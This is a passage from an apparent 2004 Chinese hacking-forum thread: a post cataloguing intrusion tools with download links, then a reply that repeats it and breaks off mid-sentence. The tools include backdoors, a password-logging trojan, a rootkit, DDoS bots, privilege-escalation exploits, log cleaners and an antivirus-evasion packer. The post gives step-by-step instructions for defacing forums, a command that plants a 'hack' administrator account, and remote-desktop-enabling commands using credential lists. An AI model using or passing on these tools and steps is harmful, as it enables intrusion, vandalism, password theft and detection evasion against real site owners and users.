花草玩家線上購物
   
現在的時間是 2018-08-18, 16:04

所有顯示的時間為 UTC + 8 小時




 1 頁 (共 1 頁) [ 1 篇文章 ] 
 
發表人 內容
 文章主題 : 入侵軟件綜合..
文章發表於 : 2004-03-30, 16:21 
護法
護法
頭像

註冊時間: 2002-10-10, 18:35
文章: 895
來自: 台北
這也是我網上收集的部分軟件.......希望可以幫各位帶來點幫助.
命令行後門類
winshell
WinShell是一個運行在Windows平台上的Telnet服務器軟件,主程序是一個僅僅5k左右的可執行文件,可完全獨立執行而不依賴於任何系統動態連接庫,儘管它體積小小,卻功能不凡,支持定制端口、密碼保護、多用戶登錄、NT服務方式、遠程文件下載、信息自定義及獨特的反DDOS功能等...《入侵NT中winshell的使用》
Gina

Gina木馬的主要作用是在系統用戶登陸時,將用戶登陸的名字,登陸密碼等記錄到文件中去,因為這個DLL是在登陸時加載,所以不存在象findpass那類程序在用戶名字是中文或域名是中文等無法得到用戶...儒
Wollf1.5 我們的一位女黑客寫的軟件,擴展Telnet服務,集成文件傳輸、Ftp服務器、鍵盤記錄、Sniffer(for win2k only)、端口轉發等功能,可反向連接,可通過參數選擇隨系統啟動或作為普通進程啟動
WinEggDrop Shell 1.50最終版在 一個擴展型的telnet後門程序{中國最強的後門}
***********************************************************************
***********************
菜鳥掃瞄軟件!
20CN IPC 掃瞄器正式版

全自動IPC掃瞄器,可以同步植入木馬,可以透過部分沒有配置完整的防火牆,能
夠探測流光探測不到的一些用戶...(中文版)
網絡肉雞獵手

一個快速查找網絡肉雞的小工具
網頁信息神探

使得網頁不再有秘密,各種信息一目瞭然,什麼電影、圖片、Email地址、文章、
Flash、壓縮文件、可執行文件...等等的鏈接地址無處可藏!連續而快速下載各
種軟件、打包教程、VB、VC、動畫教程、Flash、電影、寫真圖片
***********************************************************************
***************
[url=http://211.155.27.112/bbs/attachment.php?s=&postid=201571]溢出工具
封包[/url]

包括SQL2.exe SQL蠕蟲聽過吧,就是的這個漏洞!
NetScanTools 一款功能強大的網絡工具包...(英文版)
[url=http://www.chinahacker.com/soft/show.asp?id=312&down=1]THCsql
[/url]
針對David Litchfield發現的MSSQL OpenDataSource函數漏洞的攻擊程序,內含
源代碼。
小紫V2.0追加版

軟件說明:
直接覆蓋2.0的xiaozi.exe即可。獨立也可使用,只是沒了LB.EXE
2003-6-4
小紫V1.0推出,能黑註冊信息
2003-6-6
小紫V2.0推出,加入噩夢之吻功能,能黑主頁,分類,自定義文件
2003-6-8
小紫V2.0追加版推出 加入LB.EXE,可以獲得論壇管理員權限
2003-7-7
小紫V3.0推出 補加可以黑歡迎短訊功能
程序包含文件:
xiaozi.exe
lb.exe
readme.txt
此軟件只對LB論壇有效
此軟件是20NT浪心原創作品
此軟件需要VB6.0運行庫的支持
如:我們要黑
http://sundreamer.51.net/cgi-bin/leoboard.cgi
在轟炸目標裡寫http://sundreamer.51.net/cgi-bin/
在輸入你要說的話:注意,在回車的地方輸入&br&
OK。點攻擊就好了,在點查看黑頁看你的成果吧
如果不成功,在確定沒寫錯的情況下,說明對方已經打上這個補丁。
不過現在看來成功率還是很高的:(
噩夢之吻是浪心擴展的一個惡意破壞功能,威力之大,對網站將是致命的打擊
使用方法:
首先確定對方是否是絕對路徑
判斷方法http://sundreamer.51.net/cgi-bin/leoboard.cgi
這樣的路徑是絕對路徑
http://www.no1eastsea.net/jjren/cgi-bin/leoboard.cgi
這樣的就不是絕對路徑
http://sundreamer.51.net/cgi-bin/leoboard.cgi為例子
我們先要選上絕對路徑(前面打鉤)
然後選擇「黑它分類」
點噩夢之吻。在查看黑頁,我們發現,他所有的分類都進不了了
「黑他主頁」我就不多說了
我們如果要黑http://sundreamer.51.net/cgi-bin/fight.cgi 這是論壇的比武游

我們點,我要自己定義
在輸入文件裡選擇fight.cgi。在點噩夢之吻。OK:)
要http://www.no1eastsea.net/jjren/cgi-bin/leoboard.cgi
就要把絕對路徑前的鉤去掉就好:)
小紫追加版功能
比如目標論壇http://www.target.com/lb/cgi-bin/leoboard.cgi
CMD下進入lb.exe所在目錄
運行命令 lb.exe -hhttp://www.target.com/ -p 80 -b E:/website/lb/cgi-
bin/ -w /lb/cgi-bin
說明 http://www.target.com/為目標論壇的域名也可是IP
80為端口
E:/website/lb/cgi-bin/ 為論壇說在主機的絕對路徑
/lb/cgi-bin為論壇路徑
一但成功,自動加入帳號密碼都為hack的管理員
[url=http://www.chinesehack.org/soft/fire/LB5_Bomb2.0b.zip]LB5論壇轟炸
機[/url]

簡介:
LB5論壇轟炸機(修正版)2.0說明:
一、修正了第一版在很多機器不兼容,導致不能使用的問題。現支持各種Windows
類的操作系統;
二、增加了多線程、多用戶同時轟炸的功能(同時可以支持4個線程),攻擊效率
是第一版的四倍,同時開啟4個線程的使用方法為:
1.本軟件為免費軟件,但首先在天龍論壇內註冊用戶。連接地址在
http://www.lsky.ne t中找。(註:不註冊不能使用)
2.在預炸論壇內先註冊4個用戶。(如:炸彈1、炸彈2、炸彈3、炸彈4)
3.在程序中輸入這4個用戶及密碼。
4.輸入預炸論壇的論題連接地址。(例如:http://***.***.***/cgi-
bin/forums.cgi?f orum=2)在4個線程的地址框中可以輸入同樣的也可以輸入不
一樣的,作用分別為4線程同時炸一個論題和4個線程分別炸4個不同的論題。
5.分別點擊4個確定按鈕,此時即可開啟4個線程。
(開啟1-4個線程的方法同理。)
三、對轟炸的內容已無限制,增加了開始數值的設定,降低了重貼率。
[url=http://www.chinesehack.org/soft/chat/msnatt1011.zip]MSN 消息攻擊機
[/url]
這是一個用於MSN Messenger 的消息攻擊機(其實不局限於MSN 的),它具有超
快的攻擊速度,據測試,在普通Pentium 200 MMX 攻擊速度可以達到5條/秒。而
且軟件體積極小,有效節省系統資源...(
[url=http://www.chinesehack.org/soft/bo/DNTUW3.71.0.0.zip]DameWare NT
Utilities v3.71.0.0 註冊版[/url]

這是一款功能強大的Windows NT/2000/XP
服務器遠程控制軟件,只要擁有一個遠程主機的管理帳號,
就能使用它遠程GUI下登陸交互控制主機...
柳葉擦眼

這個小軟件可以列出系統所有的進程(包括隱藏的),並可以殺死進程.這個是共
享軟件...(中文版)《讓傳奇木馬走開》
[url=http://www.chinesehack.org/soft/fire/ms03-013_exp_for_win2k.rar]
Xdebug[/url]

Microsoft Windows內核消息處理本地緩衝區存在溢出漏洞
詳細請看http://www.chinesehack.org/file/bug/show.asp?id=7440
運行xDebug.exe,成功後會以SYSTEM權限運行ey4s.bat
[url=http://go.6to23.com/aihouling/wwwroot/toolsdownload/scanipc.rar]
scanipc[/url]

這個是木頭見過的最傻瓜化的入侵軟件了,只要設置好你要上傳的後門和IP範圍
,它就會開始工作了,界面簡單實用,全自動IPC掃瞄器,可以同步植入木馬,可
以透過部分沒有配置完整的防火牆,能夠探測流光探測不到的一些用戶 ...
[url=http://211.155.27.112/bbs/attachment.php?s=&postid=41257]
elsave.exe[/url]

榕哥日誌清除工具
LC4

可以檢測用戶是否使用了不安全的密碼,是最好,最快的Win NT/2000
workstations 密碼破解工具,目前這是最新版本.它宣稱:在P300機器上不到48
小時可以破解90%的超級用戶(Admin)口令.18%不到10分鐘就可以破解出來 ...
[url=http://www.chinesehack.org/soft/fire/Autocrat1.26.60.zip]獨裁者
DDOS[/url]

控制大量Server進行DDoS的工具,支持4種攻擊方法:SYN、LAND、FakePing、狂
怒之Ping,危險程度高,慎用。
程序分為Client和Server,Server在肉雞上執行後會自動安裝為NT服務程序並刪
除自身,以後將會採用NT Service方式在肉雞上作為木馬運行,可以Telnet/HTTP
控制,方法:直接在IE輸入 http://ip:8535 即可。
Server端自動兼容系統環境,在98/Me/2000/XP都能安裝,98/Me下能發起狂怒之
Ping攻擊,2000/XP下能使用所有功能。
[url=http://211.155.27.112/bbs/attachment.php?s=&postid=338610]WEBDAV通
用版[/url]

iis5sp3

默認解壓為www.kyzj.com或者www.kyzj.net
[url=http://www.hackerxfiles.com/soft/show.asp?id=38&down=1]
IECookiesView1.5[/url]

可改寫cookies信息,有此工具進行cookies欺騙就簡單多了,
[url=http://www.chinesehack.org/soft/password/dvbbs-HackPass.zip]
HackPass.exe[/url]

幫你獲得UserID和MD5碼,破解MD5碼軟件分兩個可執行文件: DVGetPass.exe 是
用來得到用戶名和密碼。 HackPass.exe 用來破解MD5碼。 HackPass.exe破解MD5
的速度比較快我作了一個測試: 3600個用戶,選暴力破解模式 20分鐘 破了1021
個6位數字的。如果掛字典 ,3秒鐘破解 所有的密碼為000000的用戶,:)
[url=http://www.chinesehack.org/soft/scan/IPScanner177.rar]IPScanner
v1.77 註冊版[/url]

這是一款強大有力的可以幫助你更好管理計算機和網絡的工具,具有Ping、檢測
打開的端口、檢測Netbios names/User name/MAC (Ethernet) vendor、共享、NT
Services、Local Groups、Global Groups、檢測遠程系統時間等功能。
[url=http://www.chinesehack.org/soft/bo/netsvc.zip]netsvc.exe 控制遠程
NT服務的Ntreskit程序[/url]

[url=http://www.chinesehack.org/soft/bo/Dtx3389v11.rar]鐵血-Open3389
V1.1[/url]

完全用批處理寫的遠程開啟3389服務的工具。不依賴管理共享了。
tx3389.bat [IP] [用戶名] [密碼]
tx3389.bat [肉雞文件]
如果指定肉雞文件批處理將從文件中讀取ip 用戶名 密碼
肉雞文件的文件格式為ip 用戶名 密碼。空格隔開。
例1:tx3389 192.168.0.2 user &&
例2:tx3389 file.txt
肉雞文件格式如下(空格隔開):
192.168.0.1 user &&
192.168.0.2 administrator 123
192.168.0.24 administrator admin
[url=http://www.chinesehack.org/soft/bo/server20033389.zip]Server 2003
的3389終端登錄器[/url]

Server 2003的3389終端登錄器,是從Windows Server 2003中提出的
open3389.rar

一個好用的開3389的小程序,比起HBULOT djxyxs ,open3389要好用多了,程序
一運行,電腦馬上重起,程序經壓縮處理後只有31k,原代碼來自紅客聯盟,本程
序在win2k server ,win2k Advanced Server上測試通過
[url=http://www.chinesehack.org/soft/sniffer/arpsni5.zip]arpsniffer
[/url]
榕哥寫的arpsniffer交換環境下的嗅探程序已經出到0.5了,這個版本最大的好處
就是內置了路由功能,不再需要更改系統配置實現。
[url=http://www.chinesehack.org/soft/fire/DebPloitLast.zip]debploit
[/url]
DebPloit Win NT/2000權限提升工具,可以將任意用戶提升到SYSTEM級別的權限
。漏洞出在smss.exe中的DEBUG子系統,所有普通用戶都可以通過該漏洞獲得對系
統中任意進程或線程句柄的控制,從而可以以SYSTEM或管理員權限執行任意命令
。2、使用方法:假設我們已經獲得一台機器上的一個GUEST用戶(或其他普通用
戶),現在我們要這個工具來獲得系統最高權限。進行如下步驟:把ERunAsX.exe
和ERunAsX.dll這兩個文件複製到目標主機上可訪問的目錄下,例如C:\下。以
GUEST身份運行&ERunAsX 要執行命令&,例如&ERunAsX cmd.exe&,這時執行的命
令是以SYSTEM 權限運行的...(請注意:具體使用以軟件內英文說明為準,內附
該BUG解決辦法),執行環境:Windows NT 4.0/2000(SPs在2002/03/12之前)
[url=http://www.chinesehack.org/soft/scan/fscan-1.0.tar.gz]fscan v1.0
[/url]
一個anti IDS的cgi掃瞄工具。
FScan112

WinNT的快速端口(TCP、UDP)命令行掃瞄儀,掃瞄速度超過每秒200個。
[url=http://www.chinesehack.org/soft/fire/IDAHack.zip]idahack ida溢出
[/url]
idq.dll

利用isapi漏洞提升權限(對sp0+sp1+sp2都非常有效,也是很棒的web後門)
ispc.exe
idq.dll連接
客戶端
MsSqlHack

MS SqlServer2000, SSNETLIB.DLL!ConnectionPreLogin.sprintf 遠程溢出
psexec

psexec是一個類似於TELNET和PCANYWHERE的工具,允許你遠程在WINDOW下執行任
意程序,可以不設置客戶端直接執行。
reboot.exe

NT下的一個重起程序。
SqlExec

天行軟件最新公開推出 MS-SQL Exec for NetHackerIII軟件,SQLExec 軟件用於
遠程MS-SQL服務器上執行MS-DOS命令。SQLExec是標準的Win32 GUI程序,自動修
改系統註冊表,設置成TCP/IP連接數據庫方式。並可以保存執行結果。
[url=http://www.chinesehack.org/down/show.asp?id=3913&down=1]SuperScan
[/url]
GUI界面的優秀掃瞄器
SYN潛伏攻擊者

為Lion SYN寫的擴展GUI界面,實現了隱藏攻擊的功能。
[url=http://www.chinesehack.org/soft/other/wget-1.8.2win32.zip]wget
[/url]
極好的命令行斷點續傳工具,功能極強。
1.8.2Windows版,支持HTTPS和改進的文件名處理方式,避免了在Linux平台下能
正確處理下載文件名而在Windows下出錯的問題。
[url=http://www.chinesehack.org/soft/password/getadmin.zip]Getadmin
[/url]
win2k+sp3配置的權限提升程序(不錯!!!) *
[url=http://www.chinesehack.org/soft/sniffer/FssnifferClient10.zip]
Fssniffer Client 1.0[/url]

程序是在Visual Basic6.0上開發的,所以需要msvbvm60.dll。這個工具是用來連
接Fs Sniffer(不會沒聽說過吧,是小榕的一個監聽器,運行在遠程肉雞上,可以
探測到對它的連接的密碼)功能確實很棒,但由於密碼很多。所以在察看結果的時
候常常會無法記住。而且並沒有保存功能。這裡並不是說小榕的軟件不好哦,只
是小榕可能工作繁忙,加上「流光」開發任務大。可能一時忙不過來。在這裡,
我們當然還要感謝一下小榕開發的fssniffer。沒有fssniffer,也就沒有這個
client了。呵呵,廢話一大堆,現在來講一下如何使用吧: 1)界面很簡單。你
輸入肉雞的ip和你綁定fssniffer的端口。按下連接。程序則會連接到你的肉雞了
。 2)然後輸入密碼,一旦連接上,你就可以用「進入」按鈕,進入機器。 3)
如果密碼正確,回顯框中就會順利出現fssniffer的歡迎界面。 4)點擊顯示結果
。會在回顯框中顯示出密碼。當然,這時你可以按下「停止顯示」。程序在這個
時候應該不會死機。 5)點擊瀏覽按鈕。選擇目錄。輸入文件名。點擊確定。 6
)然後按保存按鈕。如果順利保存。會出現提示的。這樣你就可以慢慢的看你監
聽到的密碼了。平台:WindowsNT/2000
xptsc

WIN 2000/XP 終端連接程序. 內附有COPY 文件的補丁. 格式 IP
圖檔
ort
MsSqlHack

MS SqlServer2000, SSNETLIB.DLL!ConnectionPreLogin.sprintf 遠程溢出
[url=http://211.155.27.112/bbs/attachment.php?s=&postid=36302]SQLTools
[/url]
SQL的掃瞄探測工具集合,包括:SQLPing,SQLScanner,SQLCracker,SQLDos等。
hgod

HGod V0.51----HUC DoS Tool V0.51
1. 具有SYN/DrDos/UDP/ICMP/IGMP拒絕服務測試功能的選項。
2. 只運行在Win2000/XP以上版本的Windows系統裡。
3. 能夠用來測試網絡安全產品或者常見操作系統的抗拒絕服務性能。
4. 經過測試SYN Flood能夠達到每秒50000個連接請求。
5. 殺傷力強大, 一個SYN Flood線程足以讓Win2000 IIS連接數佔滿而無法訪問。
6. 使用參數比較多, 自己慢慢摸索, 請不要使用本軟件用於破壞行為。
0.51 版功能改進:
1. 增加了ICMP/UDP/IGMP Flood發包時的隨機產生數據包大小的選項。
2. 調整了SYN Flood的線程參數及延時控制。
aspcode

針對IIS的ASP溢出漏洞已編譯好的兩段代碼,有什麼用,想你應該知道,可以試
試.
圖檔
為避免此漏洞和其他已知漏洞,請盡快安裝windows2000SP3。
rootkit

運行於Windows下的rootkit,能夠隱藏進程、開TCP/IP後門、實現內核級shell,
還具有鍵盤Sniffer的功能。最可貴的是,它還提供了程序源代碼。平台:
WinNT/2000
Xscan

一款強大的掃瞄軟件,可以和流光相媲美 採用多線程方式對指定IP地址段(或單
機)進行安全漏洞檢測,支持插件功能,提供了圖形界面和命令行兩種操作方式
,掃瞄內容包括:遠程操作系統類型及版本,標準端口狀態及端口BANNER信息,
SNMP信息,CGI漏洞,IIS漏洞,RPC漏洞,SQL-SERVER、FTP-SERVER、SMTP-
SERVER、POP3-SERVER、NT-SERVER弱口令用戶,NT服務器NETBIOS信息、註冊表信
息等。掃瞄結果保存在/log/目錄中,index_*.htm為掃瞄結果索引文件。 增SSL
插件,用於檢測SSL漏洞;升級PORT、HTTP、IIS插件...(
[url=http://go.6to23.com/aihouling/wwwroot/toolsdownload/X-way2.5.zip]
x-way2.5[/url]

採用多線程形式對服務器系統進行漏洞掃瞄和安全測試工具,X-WAY多個版本均在
Win2000下開發,建議用戶使用時候也在Win2000環境,以發揮最佳效果...(中文
版)《掃瞄工具,別忘了x-way2.5》
下面的軟件本來不想收進來給大家看,因為頂級黑客不入侵個人電腦,基本不用
別人寫的木馬,肯定是人手一個(自己編寫的木馬)
沒有任何殺毒軟件能查出來的。
***********************************************************************
***********************
使用木馬改造工具:
[url=http://secrecy.ayinfo.ha.cn/jiemi/unshell/Aspack%20Die%201.1.rar]
ASPack[/url]

這個是使用木馬都一定要會用的工具,它能壓縮木馬,不讓殺毒軟件查出來!
*********************************************************************** dick 在 23 十二月 2005 07:46 pm 作了第 1 次修改 回頂端 訪客 發表於: 30 五月 2005 03:08 pm 文章主題: Re: 入侵軟件綜合.. -------------------------------------------------------------------------------- dick 寫到:
這也是我網上收集的部分軟件.......希望可以幫各位帶來點幫助.
命令行後門類
winshell
WinShell是一個運行在Windows平台上的Telnet服務器軟件,主程序是一個僅僅5k左右的可執行文件,可完全獨立執行而不依賴於任何系統動態連接庫,儘管它體積小小,卻功能不凡,支持定制端口、密碼保護、多用戶登錄、NT服務方式、遠程文件下載、信息自定義及獨特的反DDOS功能等...《入侵NT中winshell的使用》
Gina

Gina木馬的主要作用是在系統用戶登陸時,將用戶登陸的名字,登陸密碼等記錄到文件中去,因為這個DLL是在登陸時加載,所以不存在象findpass那類程序在用戶名字是中文或域名是中文等無法得到用戶...儒
Wollf1.5 我們的一位女黑客寫的軟件,擴展Telnet服務,集成文件傳輸、Ftp服務器、鍵盤記錄、Sniffer(for win2k only)、端口轉發等功能,可反向連接,可通過參數選擇隨系統啟動或作為普通進程啟動
WinEggDrop Shell 1.50最終版在 一個擴展型的telnet後門程序{中國最強的後門}
***********************************************************************
***********************
菜鳥掃瞄軟件!
20CN IPC 掃瞄器正式版

全自動IPC掃瞄器,可以同步植入木馬,可以透過部分沒有配置完整的防火牆,能
夠探測流光探測不到的一些用戶...(中文版)
網絡肉雞獵手

一個快速查找網絡肉雞的小工具
網頁信息神探

使得網頁不再有秘密,各種信息一目瞭然,什麼電影、圖片、Email地址、文章、
Flash、壓縮文件、可執行文件...等等的鏈接地址無處可藏!連續而快速下載各
種軟件、打包教程、VB、VC、動畫教程、Flash、電影、寫真圖片
***********************************************************************
***************
[url=http://211.155.27.112/bbs/attachment.php?s=&postid=201571]溢出工具
封包[/url]

包括SQL2.exe SQL蠕蟲聽過吧,就是的這個漏洞!
NetScanTools 一款功能強大的網絡工具包...(英文版)
[url=http://www.chinahacker.com/soft/show.asp?id=312&down=1]THCsql
[/url]
針對David Litchfield發現的MSSQL OpenDataSource函數漏洞的攻擊程序,內含
源代碼。
小紫V2.0追加版

軟件說明:
直接覆蓋2.0的xiaozi.exe即可。獨立也可使用,只是沒了LB.EXE
2003-6-4
小紫V1.0推出,能黑註冊信息
2003-6-6
小紫V2.0推出,加入噩夢之吻功能,能黑主頁,分類,自定義文件
2003-6-8
小紫V2.0追加版推出 加入LB.EXE,可以獲得論壇管理員權限
2003-7-7
小紫V3.0推出 補加可以黑歡迎短訊功能
程序包含文件:
xiaozi.exe
lb.exe
readme.txt
此軟件只對LB論壇有效
此軟件是20NT浪心原創作品
此軟件需要VB6.0運行庫的支持
如:我們要黑
http://sundreamer.51.net/cgi-bin/leoboard.cgi
在轟炸目標裡寫http://sundreamer.51.net/cgi-bin/
在輸入你要說的話:注意,在回車的地方輸入&br&
OK。點攻擊就好了,在點查看黑頁看你的成果吧
如果不成功,在確定沒寫錯的情況下,說明對方已經打上這個補丁。
不過現在看來成功率還是很高的:(
噩夢之吻是浪心擴展的一個惡意破壞功能,威力之大,對網站將是致命的打擊
使用方法:
首先確定對方是否是絕對路徑
判斷方法http://sundreamer.51.net/cgi-bin/leoboard.cgi
這樣的路徑是絕對路徑
http://www.no1eastsea.net/jjren/cgi-bin/leoboard.cgi
這樣的就不是絕對路徑
http://sundreamer.51.net/cgi-bin/leoboard.cgi為例子
我們先要選上絕對路徑(前面打鉤)
然後選擇「黑它分類」
點噩夢之吻。在查看黑頁,我們發現,他所有的分類都進不了了
「黑他主頁」我就不多說了
我們如果要黑http://sundreamer.51.net/cgi-bin/fight.cgi 這是論壇的比武游

我們點,我要自己定義
在輸入文件裡選擇fight.cgi。在點噩夢之吻。OK:)
要http://www.no1eastsea.net/jjren/cgi-bin/leoboard.cgi
就要把絕對路徑前的鉤去掉就好:)
小紫追加版功能
比如目標論壇http://www.target.com/lb/cgi-bin/leoboard.cgi
CMD下進入lb.exe所在目錄
運行命令 lb.exe -hhttp://www.target.com/ -p 80 -b E:/website/lb/cgi-
bin/ -w /lb/cgi-bin
說明 http://www.target.com/為目標論壇的域名也可是IP
80為端口
E:/website/lb/cgi-bin/ 為論壇說在主機的絕對路徑
/lb/cgi-bin為論壇路徑
一但成功,自動加入帳號密碼都為hack的管理員
[url=http://www.chinesehack.org/soft/fire/LB5_Bomb2.0b.zip]LB5論壇轟炸
機[/url]

簡介:
LB5論壇轟炸機(修正版)2.0說明:
一、修正了第一版在很多機器不兼容,導致不能使用的問題。現支持各種Windows
類的操作系統;
二、增加了多線程、多用戶同時轟炸的功能(同時可以支持4個線程),攻擊效率
是第一版的四倍,同時開啟4個線程的使用方法為:
1.本軟件為免費軟件,但首先在天龍論壇內註冊用戶。連接地址在
http://www.lsky.ne t中找。(註:不註冊不能使用)
2.在預炸論壇內先註冊4個用戶。(如:炸彈1、炸彈2、炸彈3、炸彈4)
3.在程序中輸入這4個用戶及密碼。
4.輸入預炸論壇的論題連接地址。(例如:http://***.***.***/cgi-
bin/forums.cgi?f orum=2)在4個線程的地址框中可以輸入同樣的也可以輸入不
一樣的,作用分別為4線程同時炸一個論題和4個線程分別炸4個不同的論題。
5.分別點擊4個確定按鈕,此時即可開啟4個線程。
(開啟1-4個線程的方法同理。)
三、對轟炸的內容已無限制,增加了開始數值的設定,降低了重貼率。
[url=http://www.chinesehack.org/soft/chat/msnatt1011.zip]MSN 消息攻擊機
[/url]
這是一個用於MSN Messenger 的消息攻擊機(其實不局限於MSN 的),它具有超
快的攻擊速度,據測試,在普通Pentium 200 MMX 攻擊速度可以達到5條/秒。而
且軟件體積極小,有效節省系統資源...(
[url=http://www.chinesehack.org/soft/bo/DNTUW3.71.0.0.zip]DameWare NT
Utilities v3.71.0.0 註冊版[/url]

這是一款功能強大的Windows NT/2000/XP
服務器遠程控制軟件,只要擁有一個遠程主機的管理帳號,
就能使用它遠程GUI下登陸交互控制主機...
柳葉擦眼

這個小軟件可以列出系統所有的進程(包括隱藏的),並可以殺死進程.這個是共
享軟件...(中文版)《讓傳奇木馬走開》
[url=http://www.chinesehack.org/soft/fire/ms03-013_exp_for_win2k.rar]
Xdebug[/url]

Microsoft Windows內核消息處理本地緩衝區存在溢出漏洞
詳細請看http://www.chinesehack.org/file/bug/show.asp?id=7440
運行xDebug.exe,成功後會以SYSTEM權限運行ey4s.bat
[url=http://go.6to23.com/aihouling/wwwroot/toolsdownload/scanipc.rar]
scanipc[/url]

這個是木頭見過的最傻瓜化的入侵軟件了,只要設置好你要上傳的後門和IP範圍
,它就會開始工作了,界面簡單實用,全自動IPC掃瞄器,可以同步植入木馬,可
以透過部分沒有配置完整的防火牆,能夠探測流光探測不到的一些用戶 ...
[url=http://211.155.27.112/bbs/attachment.php?s=&postid=41257]
elsave.exe[/url]

榕哥日誌清除工具
LC4

可以檢測用戶是否使用了不安全的密碼,是最好,最快的Win NT/2000
workstations 密碼破解工具,目前這是最新版本.它宣稱:在P300機器上不到48
小時可以破解90%的超級用戶(Admin)口令.18%不到10分鐘就可以破解出來 ...
[url=http://www.chinesehack.org/soft/fire/Autocrat1.26.60.zip]獨裁者
DDOS[/url]

控制大量Server進行DDoS的工具,支持4種攻擊方法:SYN、LAND、FakePing、狂
怒之Ping,危險程度高,慎用。
程序分為Client和Server,Server在肉雞上執行後會自動安裝為NT服務程序並刪
除自身,以後將會採用NT Service方式在肉雞上作為木馬運行,可以Telnet/HTTP
控制,方法:直接在IE輸入 http://ip:8535 即可。
Server端自動兼容系統環境,在98/Me/2000/XP都能安裝,98/Me下能發起狂怒之
Ping攻擊,2000/XP下能使用所有功能。
[url=http://211.155.27.112/bbs/attachment.php?s=&postid=338610]WEBDAV通
用版[/url]

iis5sp3

默認解壓為www.kyzj.com或者www.kyzj.net
[url=http://www.hackerxfiles.com/soft/show.asp?id=38&down=1]
IECookiesView1.5[/url]

可改寫cookies信息,有此工具進行cookies欺騙就簡單多了,
[url=http://www.chinesehack.org/soft/password/dvbbs-HackPass.zip]
HackPass.exe[/url]

幫你獲得UserID和MD5碼,破解MD5碼軟件分兩個可執行文件: DVGetPass.exe 是
用來得到用戶名和密碼。 HackPass.exe 用來破解MD5碼。 HackPass.exe破解MD5
的速度比較快我作了一個測試: 3600個用戶,選暴力破解模式 20分鐘 破了1021
個6位數字的。如果掛字典 ,3秒鐘破解 所有的密碼為000000的用戶,:)
[url=http://www.chinesehack.org/soft/scan/IPScanner177.rar]IPScanner
v1.77 註冊版[/url]

這是一款強大有力的可以幫助你更好管理計算機和網絡的工具,具有Ping、檢測
打開的端口、檢測Netbios names/User name/MAC (Ethernet) vendor、共享、NT
Services、Local Groups、Global Groups、檢測遠程系統時間等功能。
[url=http://www.chinesehack.org/soft/bo/netsvc.zip]netsvc.exe 控制遠程
NT服務的Ntreskit程序[/url]

[url=http://www.chinesehack.org/soft/bo/Dtx3389v11.rar]鐵血-Open3389
V1.1[/url]

完全用批處理寫的遠程開啟3389服務的工具。不依賴管理共享了。
tx3389.bat [IP] [用戶名] [密碼]
tx3389.bat [肉雞文件]
如果指定肉雞文件批處理將從文件中讀取ip 用戶名 密碼
肉雞文件的文件格式為ip 用戶名 密碼。空格隔開。
例1:tx3389 192.168.0.2 user &&
例2:tx3389 file.txt
肉雞文件格式如下(空格隔開):
192.168.0.1 user &&
192.168.0.2 administrator 123
192.168.0.24 administrator admin
[url=http://www.chinesehack.org/soft/bo/server20033389.zip]Server 2003
的3389終端登錄器[/url]

Server 2003的3389終端登錄器,是從Windows Server 2003中提出的
open3389.rar

一個好用的開3389的小程序,比起HBULOT djxyxs ,open3389要好用多了,程序
一運行,電腦馬上重起,程序經壓縮處理後只有31k,原代碼來自紅客聯盟,本程
序在win2k server ,win2k Advanced Server上測試通過
[url=http://www.chinesehack.org/soft/sniffer/arpsni5.zip]arpsniffer
[/url]
榕哥寫的arpsniffer交換環境下的嗅探程序已經出到0.5了,這個版本最大的好處
就是內置了路由功能,不再需要更改系統配置實現。
[url=http://www.chinesehack.org/soft/fire/DebPloitLast.zip]debploit
[/url]
DebPloit Win NT/2000權限提升工具,可以將任意用戶提升到SYSTEM級別的權限
。漏洞出在smss.exe中的DEBUG子系統,所有普通用戶都可以通過該漏洞獲得對系
統中任意進程或線程句柄的控制,從而可以以SYSTEM或管理員權限執行任意命令
。2、使用方法:假設我們已經獲得一台機器上的一個GUEST用戶(或其他普通用
戶),現在我們要這個工具來獲得系統最高權限。進行如下步驟:把ERunAsX.exe
和ERunAsX.dll這兩個文件複製到目標主機上可訪問的目錄下,例如C:\下。以
GUEST身份運行&ERunAsX 要執行命令&,例如&ERunAsX cmd.exe&,這時執行的命
令是以SYSTEM 權限運行的...(請注意:具體使用以軟件內英文說明為準,內附
該BUG解決辦法),執行環境:Windows NT 4.0/2000(SPs在2002/03/12之前)
[url=http://www.chinesehack.org/soft/scan/fscan-1.0.tar.gz]fscan v1.0
[/url]
一個anti IDS的cgi掃瞄工具。
FScan112

WinNT的快速端口(TCP、UDP)命令行掃瞄儀,掃瞄速度超過每秒200個。
[url=http://www.chinesehack.org/soft/fire/IDAHack.zip]idahack ida溢出
[/url]
idq.dll

利用isapi漏洞提升權限(對sp0+sp1+sp2都非常有效,也是很棒的web後門)
ispc.exe
idq.dll連接
客戶端
MsSqlHack

MS SqlServer2000, SSNETLIB.DLL!ConnectionPreLogin.sprintf 遠程溢出
psexec

psexec是一個類似於TELNET和PCANYWHERE的工具,允許你遠程在WINDOW下執行任
意程序,可以不設置客戶端直接執行。
reboot.exe

NT下的一個重起程序。
SqlExec

天行軟件最新公開推出 MS-SQL Exec for NetHackerIII軟件,SQLExec 軟件用於
遠程MS-SQL服務器上執行MS-DOS命令。SQLExec是標準的Win32 GUI程序,自動修
改系統註冊表,設置成TCP/IP連接數據庫方式。並可以保存執行結果。
[url=http://www.chinesehack.org/down/show.asp?id=3913&down=1]SuperScan
[/url]
GUI界面的優秀掃瞄器
SYN潛伏攻擊者

為Lion SYN寫的擴展GUI界面,實現了隱藏攻擊的功能。
[url=http://www.chinesehack.org/soft/other/wget-1.8.2win32.zip]wget
[/url]
極好的命令行斷點續傳工具,功能極強。
1.8.2Windows版,支持HTTPS和改進的文件名處理方式,避免了在Linux平台下能
正確處理下載文件名而在Windows下出錯的問題。
[url=http://www.chinesehack.org/soft/password/getadmin.zip]Getadmin
[/url]
win2k+sp3配置的權限提升程序(不錯!!!) *
[url=http://www.chinesehack.org/soft/sniffer/FssnifferClient10.zip]
Fssniffer Client 1.0[/url]

程序是在Visual Basic6.0上開發的,所以需要msvbvm60.dll。這個工具是用來連
接Fs Sniffer(不會沒聽說過吧,是小榕的一個監聽器,運行在遠程肉雞上,可以
探測到對它的連接的密碼)功能確實很棒,但由於密碼很多。所以在察看結果的時
候常常會無法記住。而且並沒有保存功能。這裡並不是說小榕的軟件不好哦,只
是小榕可能工作繁忙,加上「流光」開發任務大。可能一時忙不過來。在這裡,
我們當然還要感謝一下小榕開發的fssniffer。沒有fssniffer,也就沒有這個
client了。呵呵,廢話一大堆,現在來講一下如何使用吧: 1)界面很簡單。你
輸入肉雞的ip和你綁定fssniffer的端口。按下連接。程序則會連接到你的肉雞了
